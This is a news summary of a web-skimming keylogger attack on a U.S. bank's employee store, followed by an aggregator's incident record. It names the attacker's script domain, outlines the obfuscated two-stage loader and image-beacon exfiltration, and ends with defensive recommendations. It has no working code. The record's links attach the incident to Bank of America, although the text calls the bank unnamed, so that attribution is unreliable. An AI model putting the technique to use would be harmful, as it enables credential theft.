Sophisticated Keylogger Attack Targets Major U.S. Bank’s Employee Store, Exposing 200,000 to Credential Theft
Cybersecurity researchers have identified a highly targeted keylogger attack on the employee store of one of America’s largest banks, compromising sensitive data for over 200,000 employees. The malware intercepted all form inputs including login credentials, payment card details, and personal information raising concerns about potential lateral movement into the bank’s internal systems.
The attack exploited a critical gap in enterprise security: employee-facing ecommerce platforms, which often fall outside standard security audits despite handling corporate credentials. Since bank employees frequently have elevated access to financial systems, such platforms become prime targets for threat actors seeking initial footholds in banking infrastructure.
The malware used a two-stage loader to evade detection. The first stage employed character code obfuscation to verify users had reached checkout pages before fetching a secondary harvesting script from js-csp.com/getInjector/. The second stage systematically extracted form data including input fields, dropdown menus, and text areas before exfiltrating stolen credentials via image beacon requests to bypass security controls.
At the time of discovery, only 1 of 97 security vendors on VirusTotal flagged the malicious infrastructure, highlighting a significant detection gap for ecommerce-specific threats. The attack pattern mirrors previous campaigns, including one targeting the Green Bay Packers, and marks the fifth getInjector campaign detected in the past year. The js-csp.com domain was registered in late December 2025, with the compromise identified within weeks of deployment.
The bank’s response was delayed due to the absence of a security.txt file, a standard channel for responsible disclosure. Despite researchers’ attempts to notify the bank via email and LinkedIn, the lack of formal security contacts hindered remediation efforts. The incident underscores the need for organizations to monitor client-side scripts, include internal ecommerce platforms in security audits, and deploy specialized threat detection for this emerging attack surface.
Source: https://cyberpress.org/malware-targets-us-bank-employees-login-credentials/
Bank of America cybersecurity rating report: https://www.rankiteo.com/company/bank-of-america
"id": "BAN1769475353",
"linkid": "bank-of-america",
"type": "Cyber Attack",
"date": "12/2025",
"severity": "85",
"impact": "3",
"explanation": "Attack with significant impact with internal employee data leaks"{'affected_entities': [{'customers_affected': '200,000 employees',
'industry': 'Financial Services',
'location': 'United States',
'name': 'Major U.S. Bank (unnamed)',
'type': 'Bank'}],
'attack_vector': 'Malicious script injection (client-side)',
'data_breach': {'data_exfiltration': 'Yes (via image beacon requests)',
'number_of_records_exposed': '200,000',
'personally_identifiable_information': 'Yes',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Login credentials',
'Payment card details',
'Personal information']},
'description': 'Cybersecurity researchers have identified a highly targeted '
'keylogger attack on the employee store of one of America’s '
'largest banks, compromising sensitive data for over 200,000 '
'employees. The malware intercepted all form inputs including '
'login credentials, payment card details, and personal '
'information, raising concerns about potential lateral '
'movement into the bank’s internal systems. The attack '
'exploited a critical gap in enterprise security: '
'employee-facing ecommerce platforms, which often fall outside '
'standard security audits despite handling corporate '
'credentials. The malware used a two-stage loader to evade '
'detection, systematically extracting form data before '
'exfiltrating stolen credentials via image beacon requests to '
'bypass security controls.',
'impact': {'data_compromised': 'Login credentials, payment card details, '
'personal information',
'identity_theft_risk': 'High',
'operational_impact': 'Potential lateral movement into internal '
'banking systems',
'payment_information_risk': 'High',
'systems_affected': 'Employee-facing ecommerce platform'},
'initial_access_broker': {'entry_point': 'Employee-facing ecommerce platform',
'high_value_targets': 'Bank employees with elevated '
'access to financial systems'},
'lessons_learned': 'Organizations need to monitor client-side scripts, '
'include internal ecommerce platforms in security audits, '
'and deploy specialized threat detection for this emerging '
'attack surface. The absence of a security.txt file '
'hindered responsible disclosure and remediation efforts.',
'motivation': 'Credential theft for potential lateral movement into banking '
'infrastructure',
'post_incident_analysis': {'root_causes': ['Lack of security audits for '
'employee-facing ecommerce '
'platforms',
'Absence of security.txt file for '
'responsible disclosure',
'Detection gap for '
'ecommerce-specific threats']},
'recommendations': ['Monitor client-side scripts for malicious activity',
'Include employee-facing ecommerce platforms in security '
'audits',
'Deploy specialized threat detection for '
'ecommerce-specific threats',
'Implement a security.txt file for responsible '
'disclosure'],
'references': [{'source': 'Cybersecurity researchers'}],
'response': {'communication_strategy': 'Delayed due to absence of '
'security.txt file'},
'title': 'Sophisticated Keylogger Attack Targets Major U.S. Bank’s Employee '
'Store, Exposing 200,000 to Credential Theft',
'type': 'Keylogger Attack',
'vulnerability_exploited': 'Lack of security audits for employee-facing '
'ecommerce platforms'}